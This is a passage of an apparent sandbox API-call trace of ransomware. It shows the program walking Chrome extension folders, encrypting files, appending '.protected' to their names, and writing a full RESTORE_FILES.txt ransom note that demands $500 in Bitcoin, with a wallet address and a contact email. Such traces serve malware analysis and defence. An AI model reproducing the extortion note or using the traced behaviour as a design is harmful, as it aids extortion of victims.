HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\RESTORE_FILES.txt") returned 147 [0078.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0078.863] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0078.863] lstrlenA (lpString="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") returned 684 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 
[0078.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0078.864] CloseHandle (hObject=0x15c) returned 1 [0078.865] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0078.865] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0078.865] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\RESTORE_FILES.txt") returned 141 [0078.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.866] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0078.866] lstrlenA (lpString="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") returned 684 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0078.866] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.866] CloseHandle (hObject=0x158) returned 1 [0078.867] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="$Recycle.bin") returned 1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 123 [0078.867] lstrcmpW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0078.867] lstrcmpW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*") returned 125 [0078.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.867] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.867] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\.") returned 125 [0078.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.867] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.867] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\..") returned 126 [0078.868] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.868] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.868] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Windows") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files (x86)") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="$Recycle.bin") returned 1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="System Volume Information") returned -1 [0078.868] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 129 [0078.868] lstrcmpW (lpString1="0.9_0", lpString2=".") returned 1 [0078.868] lstrcmpW (lpString1="0.9_0", lpString2="..") returned 1 [0078.868] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*") returned 131 [0078.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0078.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\.") returned 131 [0078.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.881] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\..") returned 132 [0078.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.881] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.881] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0078.881] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.881] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.881] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0078.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0078.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0078.883] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xc8d, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff373, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xc8d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xc8d, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: 
lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.884] CloseHandle (hObject=0x160) returned 1 [0078.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected") returned 152 [0078.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected")) returned 1 [0078.886] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0078.886] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.886] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0078.886] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW 
(lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0078.887] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x8f, lpOverlapped=0x0) returned 1 [0078.888] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x8f, lpOverlapped=0x0) returned 1 [0078.888] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.888] CloseHandle (hObject=0x160) returned 1 [0078.888] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected") returned 151 [0078.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected")) returned 1 [0078.889] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Windows") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0078.889] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.889] StrStrIW (lpFirst="main.html", lpSrch=".protected") returned 0x0 [0078.889] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0078.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0078.890] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.891] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.892] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.892] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.892] WriteFile 